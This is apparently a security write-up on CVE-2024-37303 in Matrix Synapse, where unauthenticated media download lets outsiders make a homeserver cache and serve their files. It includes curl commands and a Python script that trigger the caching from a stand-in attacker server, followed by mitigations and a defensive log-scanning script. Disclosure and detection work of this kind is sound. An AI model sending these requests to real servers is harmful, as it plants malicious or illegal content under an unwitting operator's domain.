Matrix’s Synapse is a big deal for secure, decentralized chat. But in June 2024, a new vulnerability, CVE-2024-37303, highlighted how an unauthenticated remote user can abuse media handling, potentially planting malicious or illegal content on your server for anyone to download. Here’s why this matters, how the exploit works, a look at the code, and what you can do to protect yourself.
What’s the Issue?
In Synapse servers before version 1.106, it’s possible for someone outside your server—*without even logging in*—to make your homeserver download and cache a file (such as an image, video, or document) hosted on their own server. Once cached, that file is now available to anyone (still no authentication needed) from your server as if it were your own media.
1. Uploading Content Remotely: An attacker uploads problematic media (malware, illegal images, etc.) to a Matrix homeserver they control.
2. Triggering the Download: Using unauthenticated endpoints on other public Matrix homeservers (including yours), they ask your server to fetch and cache that file by simply referencing the media ID and server name.
3. Rogue Media Hosted Locally: Your server fetches, stores, and makes that content available on its public media endpoint for everyone, without authentication.
What Does This Look Like in Code?
Suppose your server is my.matrix.org and the attacker’s is evil.matrix.net. The attacker’s file has a media ID of xyz123.
The following request (no login needed!) triggers your server to download and cache the media:

```http
GET /_matrix/media/v3/download/evil.matrix.net/xyz123 HTTP/1.1
Host: my.matrix.org
```

You can try this with curl:

```shell
curl -v "https://my.matrix.org/_matrix/media/v3/download/evil.matrix.net/xyz123"
```
When you run this, my.matrix.org fetches and caches the file from evil.matrix.net, then serves it up to anyone.
Anonymity for Attackers: The whole process is unauthenticated. Attackers can plant and serve problematic media via your domain, leaving you with the legal and reputational risk.
1. Attacker Prepares Media: On their own Matrix server, evil.matrix.net, the attacker uploads a malicious file and gets the media ID, say, abcde12345.
2. Using curl (or a browser), they hit your public homeserver:

   ```shell
   curl "https://your.matrix.org/_matrix/media/v3/download/evil.matrix.net/abcde12345"
   ```

3. Now, your server downloads and stores the file in its local repo.
4. Anyone can now retrieve the file directly from your homeserver:

   ```shell
   curl "https://your.matrix.org/_matrix/media/v3/download/evil.matrix.net/abcde12345"
   ```

   Or from the internal cache, which usually lands at a different URL depending on your setup.
Here’s a simple Python script that automates the attack:

```python
import requests

# Target Synapse server (victim)
target = "https://your.matrix.org"

# Attacker's media info
evil_server = "evil.matrix.net"
media_id = "abcde12345"

# Trigger download and cache: the unauthenticated download endpoint makes
# the victim server fetch the remote media and store it in its local repo
endpoint = f"{target}/_matrix/media/v3/download/{evil_server}/{media_id}"
response = requests.get(endpoint, timeout=30)

if response.status_code == 200:
    print("Media cached successfully on victim server!")
else:
    print(f"Failed: {response.status_code}")
```
- New endpoints now require authentication for media download.
- Old unauthenticated endpoints still function for compatibility, but will be frozen and eventually closed in a future release.
- Upgrade: Upgrade ASAP to at least 1.106.
- Restrict Media Access: Consider restricting unauthenticated access to media endpoints using a web server config (nginx, Apache, etc.).
- Review Logs: Look for odd requests to /_matrix/media/v3/download/ for remote server names you don’t recognize.
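As an added example (not part of the original post or the Synapse project), here is a small Python script that does that log review: it scans web-server access-log lines for remote media download and thumbnail requests whose origin server is neither your own homeserver nor a known federation partner, and tallies them per client IP. The log lines are constructed samples, and the homeserver name and allowlist are assumptions you would replace with your own.

```python
import re
from collections import Counter

# Constructed sample access-log lines (Combined Log Format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Jun/2024:10:01:02 +0000] "GET /_matrix/media/v3/download/evil.matrix.net/abcde12345 HTTP/1.1" 200 51234 "-" "curl/8.5.0"
198.51.100.4 - - [14/Jun/2024:10:01:05 +0000] "GET /_matrix/media/v3/download/matrix.org/AbCdEf HTTP/1.1" 200 9876 "-" "Element/1.11"
203.0.113.7 - - [14/Jun/2024:10:01:09 +0000] "GET /_matrix/media/v3/thumbnail/evil.matrix.net/abcde12345?width=96&height=96 HTTP/1.1" 200 2048 "-" "curl/8.5.0"
198.51.100.9 - - [14/Jun/2024:10:02:00 +0000] "GET /_matrix/client/v3/sync HTTP/1.1" 200 123 "-" "Element/1.11"
203.0.113.7 - - [14/Jun/2024:10:02:30 +0000] "GET /_matrix/media/r0/download/evil.matrix.net/zzz999 HTTP/1.1" 404 0 "-" "curl/8.5.0"
"""

LOCAL_SERVER = "my.matrix.org"   # assumed: this homeserver's server name
KNOWN_SERVERS = {"matrix.org"}   # assumed: federation partners you expect media from

# Matches download/thumbnail requests on the legacy (r0/v1) and current (v3) media paths.
MEDIA_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "GET '
    r'/_matrix/media/(?:r0|v1|v3)/(?:download|thumbnail)/'
    r'(?P<server>[^/\s?]+)/(?P<media_id>[^/\s?]+)[^"]*" (?P<status>\d{3})'
)


def find_unknown_remote_media(log_text, local_server=LOCAL_SERVER, known=KNOWN_SERVERS):
    """Return media requests whose origin server is neither local nor allowlisted."""
    hits = []
    for line in log_text.splitlines():
        m = MEDIA_RE.match(line)
        if not m:
            continue
        server = m.group("server").lower()
        if server == local_server or server in known:
            continue
        hits.append({"ip": m.group("ip"), "server": server,
                     "media_id": m.group("media_id"), "status": int(m.group("status"))})
    return hits


def summarize(hits):
    """Count (client IP, origin server) pairs so repeated remote-fetch attempts stand out."""
    return Counter((h["ip"], h["server"]) for h in hits)


if __name__ == "__main__":
    found = find_unknown_remote_media(SAMPLE_LOG)
    for (ip, server), n in summarize(found).most_common():
        print(f"{ip} requested {n} media object(s) from unknown server {server}")
```

A 200 on such a request means the media is now served from your domain, so those hits are the ones to check in your media repository and consider quarantining.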
References and Further Reading
- Matrix Security Advisory: CVE-2024-37303
- Synapse GitHub Repository
- Matrix Media API Docs
Conclusion
CVE-2024-37303 shows a simple, powerful way for attackers to plant problematic files into community chat servers, with zero authentication. If you run Matrix Synapse, update now, audit your media repo, and watch for future endpoint changes that will finally close this security gap.
Timeline
Published on: 12/03/2024 17:15:10 UTC